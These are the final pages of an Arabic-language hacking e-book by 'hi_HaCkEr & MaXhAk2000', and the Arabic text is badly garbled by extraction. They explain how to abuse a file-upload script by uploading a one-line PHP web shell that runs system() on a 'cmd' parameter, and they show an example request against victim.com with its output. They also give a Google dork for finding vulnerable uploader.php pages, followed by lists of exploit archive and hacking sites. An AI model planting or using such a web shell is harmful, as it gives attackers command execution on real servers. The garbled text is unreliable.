ﺘﻐﯿﯿ ﺮاﻟﺒﺎﺳﻮورد ﻣﻦﻫﻨﺎااا ﻗﻢﺑ
option is Yes
$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the
htmlﻋﺪداﻟﻤﻠﻔﺎ ت
page
$ADMIN[directory] = "uploads"; // The directory the files will be
)uploaded to (must be chmoded to 777ﺎﺳﻢ ﻣﺠﻠﺪ ﺎﻟﻤﻠ ﻒاﺗ ﺮﻛﻪﻛﻤﺎ ﻫﻮاو ﻏﯿ ﺮهﻓﻠﻚ
اﻟﺨﯿﺎر
----------------------------------------------------------------------------------------
<?php
;]"$cmd = $_GET["cmd
;)"system("$cmd
>?
ﺘﻄﯿﻊﺗﻨﻔﯿﺬاواﻣ ﺮ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ ...... etc
ـ cmdﻮﻧﺴ
ﺳﻨﺼ ﻞﻟﻠ
ﻓﺎذا ﻧﻔﺬﻧﺎ
٢ ٥٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
http://www.victim.com/uploads/shellemul.php?cmd=id
ﺳﯿﻜﻮن ﺎﻟﻨﺎﺗ ﺞ ﻣﺜﻼ
)uid=21(apache) gid=21(apache) groups=21(apache
ﺘﻊ )انﻟﻢ
ﺘﻤﺛ ﻞﻟﻪ واﺳ
ﻃﺒﻌﺎﻫﺬا ﺳﻜ ﺮﺑ ﺖﺑﺴﯿﻂ وﻟﻤﺰﯾﺪ ﻣﻦاﻟ ﺮﻓﺎﻫﯿﺔارﻓﻊ ﺳﻜ ﺮﺑ ﺖاﻟﺸ ﻞاواي ﺳﻜ ﺮﺑ ﺖ ﻣﻤﺎ
ﯾﻜﻦاﻟﺴﯿ ﺮﻓ ﺮﻓﻲ ﺣﺎﻟﺔ ﺳﯿ ﻒ ﻣﻮد(
ﺘﺒﻌﺎﻫﺬهاﻟﻄ ﺮﯾﻘﺔ
ﺎﺑ ﺤﺚﻓﻲ ﺟﻮﺟ ﻞ ﻣ
allinurl: uploader.php
ﺘﺎﺋ ﺞ
ﺘ ﺮىاﻟﻨ
ﻮﺳ
٢ ٥٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
ﺘﻲ:::
ﺘﻪ ﻋﻠﻰ ﺣﺪ ﻣﻌ ﺮﻓ
ﺘﺪﯾﺎ تاﻟﻌ ﺮﺑﯿﺔﻓﻲ ﻣﺠﺎ لاﻟﻬﺎكﺑﺠﻤﯿﻊ ﻣﺠﺎﻟ
ﻗﻊ واﻟﻤﻨ
ﻗﺪﻟﻜﻢأﻓ ﻀ ﻞاﻟﻤﻮا
أ
ﺘﻲﺗﺪﻋﻢ ﻋﻠﻢاﻟﻬﺎك...
ﻗﻊاﻟﻌ ﺮﺑﯿﺔاﻟ
ﺘﻪ ﻋﻦاﻟﻤﻮا
ﺘﻪ وﺗﺼﻔ ﺤ
ﻫﺬهاﻓ ﻀ ﻞ ﻣﺎرأﯾ
٢ ٥٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
ﺘﺨﺪﻣﻬﺎاﻟﻬﻜ ﺮﻟﻤﻌ ﺮﻓﺔا ﺧ ﺮ ﺎﻟﺜﻐ ﺮا تاﻟﺼﺎدره ﻣﻊ ﻣﻘﺎﻻ تﺑﺴﯿﻂﻟﻬﺬه ﺘﻲ ﯾﺴﻗﻊاﻟﻤﻬﻤﺔاﻟ ﻫﺬهﺑﻌ ﺾاﻟﻤﻮا
ﻗﻊ اﻟﻤﻮا
ﻗﻊPacket Storm Security ﻣﻮ
----------------------
ﺎﻟﻌﻨﻮان http://packetstorm.securify.com/ :
ﺘﻌﻠﻘﺔﺑﺎﻷﻣﻦ ﺘﻲﺗ ﺤﻤ ﻞﻛﻌﻠﻮﻣﺎ ت ﻣﻮا ﺣﺪ ﻣﻦاﻛﺒ ﺮﻗﻮاﻋﺪ ﺎﻟﺒﯿﺎﻧﺎ تاﻟ
ﻗﻊ ﻣ ﺮهﻓﻲاﻟﯿﻮمﻟﻘ ﺮا ءةﻗﺴﻢ ' 'New Files Todayﺳﻮا ءاﻟﻠﺒ ﺤﺚ ﻋﻦ ﺎﻧﺎاﻓ ﻀ ﻞاﻟﺬﻫﺎباﻟﻰﻫﺬااﻟﻤﻮ
ﺛﻐ ﺮا ت ﻣﻌﯿﻨﻪاوﻷ.
ﺘﻬﻠﻚ ﻣﺌﺎ تاﻻﻟﻮ ف ﻣﻦاﻟﻨﻘ ﺮا تﻛ ﻞ
ﻗﻊ ﯾﺴ
ﺎوﺟﺪ ﺎﻻرﺷﯿ ﻒ ﻋﻦ ﻃ ﺮﯾ ﻖ Ken Williamsﺣﯿﺚان ﻫﺬااﻟﻤﻮ
ﺎﺳﺒﻮ ع
ﺘﻪاﻟﻰ ﻣﺎﻟﻚ ) (.http://www .securify.com/ Kroll-O-Nagra ﺘﻘﻠ ﺖ ﻣﻠﻜﯿ
ﺣﺎﻟﯿﺎاﻧ
ﺎﻟﺒ ﺤﺚSearching
------------
ﺘﺎﺑ ﺖ
ﺘﺎجﻟﻜ
ﺘﺤﺘﻌﻠﻘﺔﺑﺨﺪﻣﻪ ﻣﻌﯿﻨﺔ ﻣﺜﻼ Sendmail 8.8.3ﻓﺴ ﺎذاﻛﻨ ﺖﺗ ﺮﯾﺪ ﺎﻟﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣ
''sendmail 8.8.3ﻮاذاارد تاﻟﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮه ﻣﻌﯿﻨﻪ ﻣﺜﻼ ﻫﺠﻮم ﺣﺠﺐاﻟﺨﺪﻣﻪ local DoSﺿﺪاي
ﻧﺴﺨﻪ ﻣﻦ sendmail
ﺘﺒﺎس.
ﻗﺘﺎﻟﻲ ': 'local DoS sendmailﺑﺪون ﻋﻼﻣﺎ ت ﺎﻻ ﺘﺎﺑ ﺖاﻟ
ﻓﻤﺎ ﻋﻠﯿﻚاﻻﻛ
ﻗﻊاﻻ ﺧ ﺮى:::
وﻫﺬهﺑﻌ ﺾاﻟﻤﻮا
٢ ٥٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
http://rootshell.redi.tk/ ﻗﻊ
ﻣﻮ .١
http://www.ussrback.com ﻗﻊ ﻣﻮ .٢
http://www .insecure.org/sploits.html ﻗﻊ ﻣﻮ .٣
http://www.linux.com.cn/hack.co.za ﻗﻊ ﻣﻮ .٤
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
=
ﻗﻊ
وﻫﺬهاﻟﻤﻮا،ﺘﻲﺑﻬﺎ ﺿﺌﯿﻠﺔﻟﻌﺪمﺗﻮﺳﻌﻲﻓﻲاﻟﻠﻐﺔاﻹﻧﺠﻠﯿﺰﯾﺔ ﻗﻊاﻟﻬﺎكاﻹﻧﺠﻠﯿﺰﯾﺔﻓﻤﻌ ﺮﻓ
أﻣﺎﺑﺎﻟﻨﺴﺒﺔﻟﻤﻮا
:::ﺘﺎﻟﻲ
ﻛﺎﻟ
http://www.haker.com.pl ﻗﻊ ﻣﻮ.١
http://www .webattack.com/ ﻗﻊ ﻣﻮ.٢
http://blacksun.box.sk ﻗﻊ ﻣﻮ.٣
http://www .blackcode.com ﻗﻊ ﻣﻮ.٤
...
٢ ٥٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺎﻟﺨﺎﺗﻤﺔ
ﺘﺎب واﻟﺬي ﻻﻧ ﺮﺟﻮا ﻣﻦ ورا ءهاﻻاﻟﺨﯿ ﺮ واﻟﺜﻮاب
ﻧ ﺤﻤﺪا ﷲ وﻧﺸﻜ ﺮه ﻋﻠﻰان وﻓﻘﻨﺎ ﻹﺗﻤﺎم ﻫﺬااﻟﻜ
ﻓﻼﺗﻨﺴﻮﻧﺎ ﻣﻦ دﻋﻮةﻓﻲ ﻇﻬ ﺮاﻟﻐﯿﺐﻟﻨﺎ وﻹ ﺧﻮاﻧﻨﺎاﻟﻤﺴﻠﻤﯿﻦﻓﻲﻛ ﻞ ﻣﻜﺎن.
ﺘﻮي ﻋﻠﻰ ﺷ ﺮو حﻟﻠﺜﻐ ﺮا ت وﻣﻦﻫﺬااﻟﻘﺎﺑﯿ ﻞﺘﺎب ﻻ ﯾ ﺤ ﻟﻜﻦ ﻧﻨﻮه ﻫﻨﺎاﻟﻼ ﺷﻲ ءﻗﺪ ﯾﻘﻮ لاﻟﺒﻌ ﺾ ﻫﺬااﻟﻜ
ﺘﻬﻰ ﺘﺄﺳﯿ ﺲ وﻣﻦﺛﻢ ﯾﻨﻄﻠ ﻖاﻟﺸﺨ ﺺﻓﻲﻫﺬااﻟﻌﻠﻢاﻟﺬي ﻻ ﯾﻨ ﻟﻜﻦ ﻧﻘﻮ ل ﻧ ﺤﻦأﻧﻪ ﯾﺠﺐﻓﻲاﻟﺒﺪاﯾﺔاﻟ
ﻗﯿﻌﺎﻟﻜﻦ ﺷ ﺮ ﺣﻨﺎﺑﻌ ﻀﻬﺎ ﻣﻦأﺟ ﻞﺑﺎب ﺘﻢﺗ ﺮﺘﻬﻲ وﯾ
ﻗ ﺖ ﻣ ﺤﺪد وﺗﻨوﯾﻔﻘﻪ ﻧﻔﺴﻪﺑﻨﻔﺴﻪ ،،وأﯾ ﻀﺎأناﻟﺜﻐ ﺮا تﻟﻬﺎ و
ﺘﻔﺎدة ﻻ ﻏﯿ ﺮ...
اﻟﻌﻠﻢﺑﺎﻟﺸﻲ ء وﻟ ﻺﺳ
ﺘﺎر ﻣ ﺤﻤﺪاﺑﻦ ﻋﺒﺪا ﷲ ﻋﺪد ﻣﺎﺗ ﺮاﻛﻤ ﺖاﻟﺴ ﺤﺐ وﻋﺪد ﻣﺎﺗﺰا ﺧ ﺮ تاﻟﻨﺠﻮم ...
ﻫﺬا و ﺻﻠﻰا ﷲ ﻋﻠﻰاﻟﻨﺒﻲاﻟﺨ
++++++++++++++++++++++++
ﺘﻔﺴﺎرأو ﻧﺼﯿ ﺤﻪ ﯾ ﺮﺟﻰ ﻣ ﺮاﺳﻠﺔ+ -:
أياﺳ
+ Hi_hacker@hotmail.com
+ Maxhak2000@hotmail.com
++++++++++++++++++++++++
٢ ٥٩